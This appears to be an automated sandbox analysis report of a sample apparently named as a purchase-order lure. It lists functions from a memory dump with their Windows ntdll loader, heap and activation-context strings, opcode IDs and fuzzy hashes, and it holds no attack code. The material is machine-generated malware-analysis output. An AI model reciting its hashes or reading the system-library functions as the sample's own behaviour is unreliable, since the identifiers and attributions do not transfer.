                                                      • undeleted critical section in freed memory, xrefs: 0154542B
                                                      • Critical section debug info address, xrefs: 0154541F, 0154552E
                                                      • double initialized or corrupted critical section, xrefs: 01545508
                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015454E2
                                                      • Critical section address., xrefs: 01545502
                                                      • Invalid debug info address of this critical section, xrefs: 015454B6
                                                      • 8, xrefs: 015452E3
                                                      • corrupted critical section, xrefs: 015454C2
                                                      • Thread identifier, xrefs: 0154553A
                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0154540A, 01545496, 01545519
                                                      • Address of the debug info found in the active list., xrefs: 015454AE, 015454FA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                      • API String ID: 0-2368682639
                                                      • Opcode ID: d82d780b04a8e09e1f18f1da6a9b3a6a430f48c7696d7b5a2c8019aa76093e4e
                                                      • Instruction ID: 5f34bc8b700b5a792d0c50778f25463c40f39126f440fecc71fdf520166f023f
                                                      • Opcode Fuzzy Hash: d82d780b04a8e09e1f18f1da6a9b3a6a430f48c7696d7b5a2c8019aa76093e4e
                                                      • Instruction Fuzzy Hash: 71818FB0A41349EFDB61CF99C885BEEBBF9BB08714F20411AF505BB250D375A945CB60
                                                      Function 015029F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01542409
                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01542602
                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01542506
                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01542624
                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01542412
                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0154261F
                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01542498
                                                      • @, xrefs: 0154259B
                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015422E4
                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015425EB
                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015424C0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                      • API String ID: 0-4009184096
                                                      • Opcode ID: c5523077acb33f3c3c36a083b245cbc2c7bae3c0c213f3369d92342cceddc4cc
                                                      • Instruction ID: 97fe3236e3c4571f094845e808a80188c94754b3e6097ac87f5fbe79dba17f51
                                                      • Opcode Fuzzy Hash: c5523077acb33f3c3c36a083b245cbc2c7bae3c0c213f3369d92342cceddc4cc
                                                      • Instruction Fuzzy Hash: 780250F1D002299BDB22DB54CD84BEDB7B8BF54314F4045DAE609AB281DB709E84CF69
                                                      Function 01578B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                      • API String ID: 0-2515994595
                                                      • Opcode ID: ab8a40378fb0f01a9389abb25d174497791a4953ff942e1d1309a099682d72f0
                                                      • Instruction ID: b3f5a48c1bd1139a56b09a0724b73b8bbeee87ace86ec0c6d16e73deb9de9ca3
                                                      • Opcode Fuzzy Hash: ab8a40378fb0f01a9389abb25d174497791a4953ff942e1d1309a099682d72f0
                                                      • Instruction Fuzzy Hash: 1151D2716143029BD335CF18D84ABABBBECFF94640F55491EE959CB250E770D504C792
                                                      Function 01580274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                      • API String ID: 0-1700792311
                                                      • Opcode ID: 569e304b1296e326b79807d87f41d2740698a3d6792572f60ec757d7632d9470
                                                      • Instruction ID: 9f13fd31d3f9924556f2e5785e2f810c44dd5efbac0bc6c5ad9af34b254a982f
                                                      • Opcode Fuzzy Hash: 569e304b1296e326b79807d87f41d2740698a3d6792572f60ec757d7632d9470
                                                      • Instruction Fuzzy Hash: 52D1FE35600682DFDB22EF69C451AADBBF1FF59714F19804EF445AF2A2C7349949CB20
                                                      Function 015589B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • VerifierDebug, xrefs: 01558CA5
                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01558A67
                                                      • HandleTraces, xrefs: 01558C8F
                                                      • VerifierDlls, xrefs: 01558CBD
                                                      • AVRF: -*- final list of providers -*- , xrefs: 01558B8F
                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01558A3D
                                                      • VerifierFlags, xrefs: 01558C50
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                      • API String ID: 0-3223716464
                                                      • Opcode ID: 87a90cd74e95de4b85a7197702c298f18137c99edb0a8b1faf8d1915c13643fc
                                                      • Instruction ID: 796c9380a979ea89552a5cda7d2afec1fdd6365c899dfbf47e3d98cc1afc5178
                                                      • Opcode Fuzzy Hash: 87a90cd74e95de4b85a7197702c298f18137c99edb0a8b1faf8d1915c13643fc
                                                      • Instruction Fuzzy Hash: E8911671601B02DFD761DFAAC8A0B5A77E9BB94B14F45041EFE416F251E770AC04C791
                                                      Function 014DEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                      • API String ID: 0-1109411897
                                                      • Opcode ID: 3a075b17c6ae53054d6fcfe21a5f3f3a7779ed2a23cf778c5a9a99aa0d6ed8a3
                                                      • Instruction ID: 789607575035adf6f891f272a9f29b483b803c3d2bd739fee0b2f92dcee3c044
                                                      • Opcode Fuzzy Hash: 3a075b17c6ae53054d6fcfe21a5f3f3a7779ed2a23cf778c5a9a99aa0d6ed8a3
                                                      • Instruction Fuzzy Hash: B3A21D74A0562A8BDF75CF19C8987ADBBB5BF85304F1442EAD50DAB260DB309E85CF40
                                                      Function 015063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-792281065
                                                      • Opcode ID: 898a25ad3723594508a1155ebff48efd9fa0d949b78d30ea30d309193413efe7
                                                      • Instruction ID: fac1644ee7235e42a6e2a7ed0288b89adc6bca5d2f9d274c1cf2c3328e6f5a32
                                                      • Opcode Fuzzy Hash: 898a25ad3723594508a1155ebff48efd9fa0d949b78d30ea30d309193413efe7
                                                      • Instruction Fuzzy Hash: 5A913470B407169FEB26DF98D889BAE7BE1BF50B18F16012DE9106F2D1D7B09901C7A1
                                                      Function 014C645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpInitShimEngine, xrefs: 015299F4, 01529A07, 01529A30
                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015299ED
                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01529A2A
                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01529A01
                                                      • apphelp.dll, xrefs: 014C6496
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01529A11, 01529A3A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-204845295
                                                      • Opcode ID: 2e7becd326a52228d86b32a75eb17b58854f6657e9809f4fa8eeaee9cbb94c2a
                                                      • Instruction ID: 2719f325f447bcf910dda5550b79f2288b12ce0d0d99624dc3e058892d2f2b43
                                                      • Opcode Fuzzy Hash: 2e7becd326a52228d86b32a75eb17b58854f6657e9809f4fa8eeaee9cbb94c2a
                                                      • Instruction Fuzzy Hash: D55113712083119FE720DF25D885FAB77E8FB94A48F11491EF5959B2B0D770E904CB92
                                                      Function 01502674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01542178
                                                      • SXS: %s() passed the empty activation context, xrefs: 01542165
                                                      • RtlGetAssemblyStorageRoot, xrefs: 01542160, 0154219A, 015421BA
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015421BF
                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0154219F
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01542180
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                      • API String ID: 0-861424205
                                                      • Opcode ID: b52baf12fba3c3cfed544601a6417d3a3bafe37fa4107337d7fa84f81810c802
                                                      • Instruction ID: 187c1f1321039db3c85c79cb05e1d15d38c62d64c6ad7e343c1606bb83ae4cd1
                                                      • Opcode Fuzzy Hash: b52baf12fba3c3cfed544601a6417d3a3bafe37fa4107337d7fa84f81810c802
                                                      • Instruction Fuzzy Hash: E5312836F4022577F7228ADA9C85F9F7B78FBE4A94F05005ABA04BF191D6709A00C7A1
                                                      Function 0150C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Loading import redirection DLL: '%wZ', xrefs: 01548170
                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 015481E5
                                                      • LdrpInitializeProcess, xrefs: 0150C6C4
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01548181, 015481F5
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0150C6C3
                                                      • LdrpInitializeImportRedirection, xrefs: 01548177, 015481EB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-475462383
                                                      • Opcode ID: d83e51c99f8b08b7ce5d1325506c07b9e574ac25e1982ba1545be5d63748e8b5
                                                      • Instruction ID: e1cdd8b17fee4c71cbd09c37b96a31a5fe284dab0cab587d2b4c9c52e739ff20
                                                      • Opcode Fuzzy Hash: d83e51c99f8b08b7ce5d1325506c07b9e574ac25e1982ba1545be5d63748e8b5
                                                      • Instruction Fuzzy Hash: 89310271A447069FC220EF6ADD46E1AB7E4FFA4B14F02065DF9416F2A1E670EC04C7A2
                                                      Function 0151096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 01512DF0: LdrInitializeThunk.NTDLL ref: 01512DFA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510BA3
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510BB6
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510D60
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510D74
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                      • String ID:
                                                      • API String ID: 1404860816-0
                                                      • Opcode ID: 5cb319fcf019c4aeaca8eee263344544f87bdd91b5b47c056e3c1cb37f3d9a66
                                                      • Instruction ID: 1fe59d3bfab6e8a35efd98d1591dcc1b16fbfd9abe1a1eda72727af21630ed97
                                                      • Opcode Fuzzy Hash: 5cb319fcf019c4aeaca8eee263344544f87bdd91b5b47c056e3c1cb37f3d9a66
                                                      • Instruction Fuzzy Hash: B7427C75900716DFEB21CF28C881BAAB7F5BF48304F1485AAE989DF245D770A984CF60
                                                      Function 014DA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                      • API String ID: 0-379654539
                                                      • Opcode ID: 8ff0a480ec8f6233d5dbd6a6b11f939be5c48ee0e5bea09f151be45b019e72c5
                                                      • Instruction ID: 443ec5996224332a6bab5da28c8d447df61d72cf75289373820fc5496db76a88
                                                      • Opcode Fuzzy Hash: 8ff0a480ec8f6233d5dbd6a6b11f939be5c48ee0e5bea09f151be45b019e72c5
                                                      • Instruction Fuzzy Hash: 5BC19A74108386CFDB11CF68C164B6ABBE4BF84704F14896EF9958B361E734CA4ACB56
                                                      Function 01508402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpInitializeProcess, xrefs: 01508422
                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0150855E
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01508421
                                                      • @, xrefs: 01508591
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1918872054
                                                      • Opcode ID: 47adcbc2bab0befa346b847c00ac40ba3e03fc1e68a71b4dbb57575b7e4e4f7d
                                                      • Instruction ID: 4984151b59fcad5817b6716380a0acccef755ae386eed4522f2692db47034080
                                                      • Opcode Fuzzy Hash: 47adcbc2bab0befa346b847c00ac40ba3e03fc1e68a71b4dbb57575b7e4e4f7d
                                                      • Instruction Fuzzy Hash: 7B919F71918745AFE722DFA5CC41FAFBAE8BF94744F40092EF6849A191E331D904CB62
                                                      Function 0150273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: %s() passed the empty activation context, xrefs: 015421DE
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015421D9, 015422B1
                                                      • .Local, xrefs: 015028D8
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015422B6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      • API String ID: 0-1239276146
                                                      • Opcode ID: 4b62286bd03b39da726100b8e5ea2d9b7d2a57cd56df16c88e4f7d736494fd57
                                                      • Instruction ID: 922e244d1e29443d9763e7ebe5fde03df874a0e7b78ec16539300332e9c6778f
                                                      • Opcode Fuzzy Hash: 4b62286bd03b39da726100b8e5ea2d9b7d2a57cd56df16c88e4f7d736494fd57
                                                      • Instruction Fuzzy Hash: 34A1C735900229DBDB25CF99DC887A9B3B5BF58354F1545EAD908AF291D7309EC0CF90
                                                      Function 01504AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RtlDeactivateActivationContext, xrefs: 01543425, 01543432, 01543451
                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01543437
                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0154342A
                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01543456
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                      • API String ID: 0-1245972979
                                                      • Opcode ID: f4794fbf750712bb08c3b9dad004084db6cbfc9ca5596abb69ee9ae4509c6677
                                                      • Instruction ID: 1b14034645017bc8ad04ffd445ea58bfed560aba66b3bad4d231b3687d6bb9fe
                                                      • Opcode Fuzzy Hash: f4794fbf750712bb08c3b9dad004084db6cbfc9ca5596abb69ee9ae4509c6677
                                                      • Instruction Fuzzy Hash: 90612532600B229BD723CF5DC885B6AB7E5FF90B64F14852DE9559F2A0D730E841CB91
                                                      Function 014D64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0153106B
                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01531028
                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015310AE
                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01530FE5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                      • API String ID: 0-1468400865
                                                      • Opcode ID: d82cde2f26bd6c7058059e73619a3a9ab2b4b24a0dbe94bce0a48fa3b5f47a3d
                                                      • Instruction ID: 9876d5cb5ec6d60e1bab18395244f6ce35aafd9883a385486e4465da7e4352b1
                                                      • Opcode Fuzzy Hash: d82cde2f26bd6c7058059e73619a3a9ab2b4b24a0dbe94bce0a48fa3b5f47a3d
                                                      • Instruction Fuzzy Hash: 8271E1B19043069FDB21DF18C894B9B7FA8BF95764F40046AF9488F29AD334D589CBD2
                                                      Function 014F245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpDynamicShimModule, xrefs: 0153A998
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0153A992
                                                      • apphelp.dll, xrefs: 014F2462
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0153A9A2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-176724104
                                                      • Opcode ID: 87699fecb00e440ea970e9893795eeab091b2ebecba48c12bba41253172cdced
                                                      • Instruction ID: a12b249f341e34e5a4f0474b0cac2ebcb644200e5fe118d98d901c5f1e467de5
                                                      • Opcode Fuzzy Hash: 87699fecb00e440ea970e9893795eeab091b2ebecba48c12bba41253172cdced
                                                      • Instruction Fuzzy Hash: C7316676600202AFDB319F599885EAE7BB4FBC0B04F17402EE960AF365C7F09946D780
                                                      Function 014E29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • HEAP: , xrefs: 014E3264
                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 014E327D
                                                      • HEAP[%wZ]: , xrefs: 014E3255
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                      • API String ID: 0-617086771
                                                      • Opcode ID: 98abe4b4537ddbfc9af554f7f26e4e51faed71748b0f1426c89fe588359fee65
                                                      • Instruction ID: 594d5a9e464e4ba581c2c1c45c82b53ce2497e76d030c604d7e43c4b6f961801
                                                      • Opcode Fuzzy Hash: 98abe4b4537ddbfc9af554f7f26e4e51faed71748b0f1426c89fe588359fee65
                                                      • Instruction Fuzzy Hash: 5D92DF71A042499FDB26CF68C448BAEBBF1FF48311F18805EE859AB361D775A942CF50
                                                      Function 014E0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-4253913091
                                                      • Opcode ID: ac1894de14298987b69d0086b03d7f641ac637a3f2e38567204d7cd98634e2be
                                                      • Instruction ID: cd120a3879275adc9bf4ce274ff1f57de517390bb2afd3a0851f163604a3d9e9
                                                      • Opcode Fuzzy Hash: ac1894de14298987b69d0086b03d7f641ac637a3f2e38567204d7cd98634e2be
                                                      • Instruction Fuzzy Hash: 90F18B30700606DFEB25CF68C898B6AB7F5FF84304F14816AE5669B3A1D774E981CB91
                                                      Function 014F6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $@
                                                      • API String ID: 0-1077428164
                                                      • Opcode ID: ec0c4383d747d73d8715e42804a5b4b197dfea69588ac166b770e2f1876ee8b6
                                                      • Instruction ID: c4b7cdca6c76842cd87c13c3853b302adbbae203198481b5372339e87b314dcf
                                                      • Opcode Fuzzy Hash: ec0c4383d747d73d8715e42804a5b4b197dfea69588ac166b770e2f1876ee8b6
